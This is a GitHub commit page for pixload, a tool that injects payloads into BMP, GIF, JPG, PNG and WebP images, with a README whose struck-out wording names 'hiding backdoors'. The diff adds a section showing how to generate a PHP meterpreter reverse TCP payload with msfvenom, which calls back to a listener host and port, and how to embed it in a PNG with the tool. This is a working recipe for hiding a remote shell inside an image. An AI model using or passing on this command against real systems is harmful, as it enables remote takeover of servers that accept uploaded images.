README.md: mention about msfvenom

sighook · Jul 29, 2020 · 3035bab · 3035bab
1 parent facd742
commit 3035bab
Show file tree

Hide file tree

Showing 2 changed files with 13 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -6,6 +6,8 @@ Set of tools for ~~hiding backdoors~~ creating/injecting payload into images.
 
 The following image types are currently supported: BMP, GIF, JPG, PNG, WebP.
 
+#### about
+
 Useful references for better understanding of `pixload` and its use-cases:
 
 - [Bypassing CSP using polyglot JPEGs](https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs)
@@ -23,6 +25,17 @@ both valid x86 shellcode and a valid image file, I recommend you to look
 [here](https://warroom.securestate.com/bmp-x86-polyglot/) and
 [here](https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/bmp_polyglot.rb).
 
+#### msfvenom
+
+If you want to inject a metasploit payload, try something like this:
+
+```bash
+msfvenom -p php/meterpreter_reverse_tcp \
+	LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php
+# Edit payload.php if need.
+./pixload/png.pl -payload "$(cat payload.php)" -output payload.png
+```
+
 ## SETUP
 
 The following Perl modules are required:

diff --git a/btc-qrcode.png b/btc-qrcode.png